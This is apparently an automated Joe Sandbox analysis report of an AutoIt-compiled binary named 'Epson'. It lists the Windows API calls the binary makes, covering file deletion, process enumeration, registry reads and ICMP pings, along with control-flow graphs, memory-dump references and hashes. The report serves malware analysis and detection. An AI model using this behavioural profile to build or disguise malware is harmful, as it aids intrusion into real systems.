                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                      • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                      • API String ID: 683915450-2030392706
                                                                                                                                                                                                                                      • Opcode ID: 4357ea03bde0851e7d513df4b970f7e962e0a22d13cbe4418bd8c2ef81446e05
                                                                                                                                                                                                                                      • Instruction ID: 716e465829a86cf760660965cc8fe828373c19b60c39bc4bbfa3bc82eeaf1d87
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4357ea03bde0851e7d513df4b970f7e962e0a22d13cbe4418bd8c2ef81446e05
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3512631508344AEDB21EFA4DC41DAE7BB8AB84751F40041DFAC19A152DF3D9A4DF722

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F55851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F555D1,?,?,00F94B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F55871
                                                                                                                                                                                                                                        • Part of subcall function 00FBEAB0: GetFileAttributesW.KERNEL32(?,00FBD840), ref: 00FBEAB1
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00FBDCCB
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00FBDD1B
                                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00FBDD2C
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00FBDD43
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00FBDD4C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                      • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                      • Opcode ID: 241b656dbee1a851d933b1b2993df8086fd14f30b834d725a887747e17565a9e
                                                                                                                                                                                                                                      • Instruction ID: 8a3d5516087cf6076f38f128da99306775fdd1823eb6d53c4afd7c878e033f10
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 241b656dbee1a851d933b1b2993df8086fd14f30b834d725a887747e17565a9e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B315C31408385AFC300EB60DC919EFB7E8BE96311F404A5DFAD596191EB25DA0DEB63

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1574 fbdd87-fbddcf CreateToolhelp32Snapshot Process32FirstW call fbe80e 1577 fbde7d-fbde80 1574->1577 1578 fbde86-fbde95 CloseHandle 1577->1578 1579 fbddd4-fbdde3 Process32NextW 1577->1579 1579->1578 1580 fbdde9-fbde58 call f5bf73 * 2 call f5b329 call f5568e call f5bd98 call f57bb5 call f6e36b 1579->1580 1595 fbde5a-fbde5c 1580->1595 1596 fbde62-fbde69 1580->1596 1597 fbde6b-fbde78 call f5bd98 * 2 1595->1597 1598 fbde5e-fbde60 1595->1598 1596->1597 1597->1577 1598->1596 1598->1597
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00FBDDAC
                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00FBDDBA
                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00FBDDDA
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FBDE87
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 420147892-0
                                                                                                                                                                                                                                      • Opcode ID: f1f77e11a23ad27090daa6c7bc05817925682d79d676d9f2b3e478e6b0c70d9a
                                                                                                                                                                                                                                      • Instruction ID: db72beef20917c406ec3f2f400d322ef9b6837f100e4a7b3239e1751ad2a3b3f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1f77e11a23ad27090daa6c7bc05817925682d79d676d9f2b3e478e6b0c70d9a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B83171711083019FD310EF50CC85AAFBBE8AF99350F44092DF985871A1EB75D949EB93
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandleMemoryProtectVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2407445808-0
                                                                                                                                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                      • Instruction ID: 94adad4c27650e45b597d11849c2f3a502268a4cc503a64cce4da7acb1457ef4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE31C771A00105DBC718CF58D484B69FBA5FF49320B24C6A6E409CB252DB31EDC1EBC2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetInputState.USER32 ref: 00F5EF07
                                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 00F5F107
                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F5F228
                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00F5F27B
                                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 00F5F289
                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F5F29F
                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00F5F2B1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2189390790-0
                                                                                                                                                                                                                                      • Opcode ID: 39d0bdba34f5f5e4eefc3308b9f91e7e6df0465756a849fac5ec657413dacc8f
                                                                                                                                                                                                                                      • Instruction ID: cd5db913e40dea0e30ffcc07b3a7c05255dc4e77d24277cff87c69018b00afa2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39d0bdba34f5f5e4eefc3308b9f91e7e6df0465756a849fac5ec657413dacc8f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F3202B0A04341EFD728CF24C884B6AB7E4BF82315F14856DFA558B291C775E94CEB92

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00F53657
                                                                                                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 00F53681
                                                                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F53692
                                                                                                                                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00F536AF
                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F536BF
                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A9), ref: 00F536D5
                                                                                                                                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F536E4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                      • Opcode ID: b214462f9912db2b1bb8ea0b3484e02f755ff463279046047c1c0bc83d5c796f
                                                                                                                                                                                                                                      • Instruction ID: d2a7ad16d35f65129f6b400818a7baa4645c385e7fb52e2b782510ce28f6239c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b214462f9912db2b1bb8ea0b3484e02f755ff463279046047c1c0bc83d5c796f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E214AB1D02348AFDB20DFD4E889BDDBBB4FB09710F10411AF651AA294D7B54140DF91

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 366 f909db-f90a0b call f907af 369 f90a0d-f90a18 call f7f636 366->369 370 f90a26-f90a32 call f85594 366->370 375 f90a1a-f90a21 call f7f649 369->375 376 f90a4b-f90a94 call f9071a 370->376 377 f90a34-f90a49 call f7f636 call f7f649 370->377 384 f90cfd-f90d03 375->384 386 f90b01-f90b0a GetFileType 376->386 387 f90a96-f90a9f 376->387 377->375 388 f90b0c-f90b3d GetLastError call f7f613 CloseHandle 386->388 389 f90b53-f90b56 386->389 391 f90aa1-f90aa5 387->391 392 f90ad6-f90afc GetLastError call f7f613 387->392 388->375 405 f90b43-f90b4e call f7f649 388->405 396 f90b58-f90b5d 389->396 397 f90b5f-f90b65 389->397 391->392 393 f90aa7-f90ad4 call f9071a 391->393 392->375 393->386 393->392 398 f90b69-f90bb7 call f854dd 396->398 397->398 399 f90b67 397->399 408 f90bb9-f90bc5 call f9092b 398->408 409 f90bc7-f90beb call f904cd 398->409 399->398 405->375 408->409 415 f90bef-f90bf9 call f88a2e 408->415 416 f90bed 409->416 417 f90bfe-f90c41 409->417 415->384 416->415 419 f90c43-f90c47 417->419 420 f90c62-f90c70 417->420 419->420 421 f90c49-f90c5d 419->421 422 f90cfb 420->422 423 f90c76-f90c7a 420->423 421->420 422->384 423->422 425 f90c7c-f90caf CloseHandle call f9071a 423->425 428 f90cb1-f90cdd GetLastError call f7f613 call f856a6 425->428 429 f90ce3-f90cf7 425->429 428->429 429->422
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F9071A: CreateFileW.KERNEL32(00000000,00000000,?,00F90A84,?,?,00000000,?,00F90A84,00000000,0000000C), ref: 00F90737
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00F90AEF
                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00F90AF6
                                                                                                                                                                                                                                      • GetFileType.KERNEL32(00000000), ref: 00F90B02
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00F90B0C
                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00F90B15
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F90B35
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00F90C7F
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00F90CB1
                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00F90CB8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                      • Opcode ID: 018fc8b7f2aa94979fe029399c68761ad2f4669ceea7b002ccd2477b53000c15
                                                                                                                                                                                                                                      • Instruction ID: 2fda26543ca6a9344ae09f8c2455ac531eb0c775ee1be58f9994f126154d5b77
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 018fc8b7f2aa94979fe029399c68761ad2f4669ceea7b002ccd2477b53000c15
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4A13832A001489FEF29EF68DC52BAD7BA1EB06324F140159F815DF2D1DB399D12EB52

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F55594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00F94B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00F555B2
                                                                                                                                                                                                                                        • Part of subcall function 00F55238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F5525A
                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F553C4
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F94BFD
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F94C3E
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00F94C80
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00F94CE7
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00F94CF6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                      • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                      • Opcode ID: 872c10074ed75f1e76d100e6a754c346b7b8bb6e96f08f23fc39395bc2fac485
                                                                                                                                                                                                                                      • Instruction ID: 0481858fa9d919edcbd1a63716760db66ea446fe94ddce28d5c55327c70dd29b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 872c10074ed75f1e76d100e6a754c346b7b8bb6e96f08f23fc39395bc2fac485
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3171EF715043019EC324DF65DC8199BBBE8FF98350F90842EF584CB264EF7AAA09DB52

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00F534DE
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00F534ED
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 00F53503
                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A4), ref: 00F53515
                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A2), ref: 00F53527
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F5353F
                                                                                                                                                                                                                                      • RegisterClassExW.USER32(?), ref: 00F53590
                                                                                                                                                                                                                                        • Part of subcall function 00F53624: GetSysColorBrush.USER32(0000000F), ref: 00F53657
                                                                                                                                                                                                                                        • Part of subcall function 00F53624: RegisterClassExW.USER32(00000030), ref: 00F53681
                                                                                                                                                                                                                                        • Part of subcall function 00F53624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F53692
                                                                                                                                                                                                                                        • Part of subcall function 00F53624: InitCommonControlsEx.COMCTL32(?), ref: 00F536AF
                                                                                                                                                                                                                                        • Part of subcall function 00F53624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F536BF
                                                                                                                                                                                                                                        • Part of subcall function 00F53624: LoadIconW.USER32(000000A9), ref: 00F536D5
                                                                                                                                                                                                                                        • Part of subcall function 00F53624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F536E4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                      • Opcode ID: 7110a9661aa28b3231104ac2ba36c5e6c579e1a35ff31a16e1f2ebd94d2aa771
                                                                                                                                                                                                                                      • Instruction ID: 15d39bdcef099bdece21744643e3a08727d03d7a39cedd0a276e9622eccec5ba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7110a9661aa28b3231104ac2ba36c5e6c579e1a35ff31a16e1f2ebd94d2aa771
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91214C70D00358ABDB309FE5EC85AA9BFB4FB4CB50F60801AFA44A6294C3BA0554DF90

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 507 fd0fb8-fd0fef call f5e6a0 510 fd100f-fd1021 WSAStartup 507->510 511 fd0ff1-fd0ffe call f5c98d 507->511 512 fd1054-fd1091 call f6c1f6 call f58ec0 call f6f9d4 inet_addr gethostbyname 510->512 513 fd1023-fd1031 510->513 511->510 519 fd1000-fd100b call f5c98d 511->519 530 fd1093-fd10a0 IcmpCreateFile 512->530 531 fd10a2-fd10b0 512->531 515 fd1036-fd1046 513->515 516 fd1033 513->516 520 fd1048 515->520 521 fd104b-fd104f 515->521 516->515 519->510 520->521 524 fd1249-fd1251 521->524 530->531 532 fd10d3-fd1100 call f7017b call f5423c 530->532 533 fd10b5-fd10c5 531->533 534 fd10b2 531->534 543 fd112b-fd1148 IcmpSendEcho 532->543 544 fd1102-fd1129 IcmpSendEcho 532->544 535 fd10ca-fd10ce 533->535 536 fd10c7 533->536 534->533 538 fd1240-fd1244 call f5bd98 535->538 536->535 538->524 545 fd114c-fd114e 543->545 544->545 546 fd11ae-fd11bc 545->546 547 fd1150-fd1155 545->547 548 fd11be 546->548 549 fd11c1-fd11c8 546->549 550 fd11f8-fd120a call f5e6a0 547->550 551 fd115b-fd1160 547->551 548->549 555 fd11e4-fd11ed 549->555 565 fd120c-fd120e 550->565 566 fd1210 550->566 552 fd11ca-fd11d8 551->552 553 fd1162-fd1167 551->553 560 fd11dd 552->560 561 fd11da 552->561 553->546 558 fd1169-fd116e 553->558 556 fd11ef 555->556 557 fd11f2-fd11f6 555->557 556->557 562 fd1212-fd1229 IcmpCloseHandle WSACleanup 557->562 563 fd1170-fd1175 558->563 564 fd1193-fd11a1 558->564 560->555 561->560 562->538 570 fd122b-fd123d call f7013d call f70184 562->570 563->552 567 fd1177-fd1185 563->567 568 fd11a6-fd11ac 564->568 569 fd11a3 564->569 565->562 566->562 571 fd118a-fd1191 567->571 572 fd1187 567->572 568->555 569->568 570->538 571->555 572->571
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WSAStartup.WS2_32(00000101,?), ref: 00FD1019
                                                                                                                                                                                                                                      • inet_addr.WSOCK32(?), ref: 00FD1079
                                                                                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 00FD1085
                                                                                                                                                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 00FD1093
                                                                                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00FD1123
                                                                                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00FD1142
                                                                                                                                                                                                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00FD1216
                                                                                                                                                                                                                                      • WSACleanup.WSOCK32 ref: 00FD121C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
